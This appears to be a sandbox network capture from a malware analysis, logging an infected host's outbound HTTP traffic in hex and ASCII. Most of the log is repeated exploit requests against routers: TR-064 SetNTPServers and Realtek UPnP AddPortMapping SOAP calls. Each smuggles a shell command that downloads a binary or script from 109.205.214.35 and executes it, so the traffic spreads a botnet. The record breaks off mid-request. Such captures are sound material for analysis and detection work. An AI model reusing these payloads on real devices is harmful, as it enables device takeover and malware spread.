                                                        Mar 21, 2024 05:23:03.526632071 CET1286INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Cont
                                                        Mar 21, 2024 05:23:03.526704073 CET1286INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 43 36 45 42 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20
                                                        Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #294
                                                        Mar 21, 2024 05:23:03.526763916 CET1114INData Raw: 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e 67 20 77 65 62 70 61 67 65 20 6f 6e 20 79 6f 75 72 0a 20 20 20 20 20 20 20
                                                        Data Ascii: t"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed with Fedora. It


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        867192.168.2.1347670194.39.114.447547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:02.789968967 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        868192.168.2.135741037.16.29.2017547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:02.789979935 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        869192.168.2.1340394175.202.210.467547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:03.440782070 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        870192.168.2.1351066221.121.70.23152869
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:03.446729898 CET987OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:05.037328959 CET987OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:06.928245068 CET987OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:10.764240026 CET987OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:18.444252968 CET987OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                        Mar 21, 2024 05:23:33.551362991 CET987OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 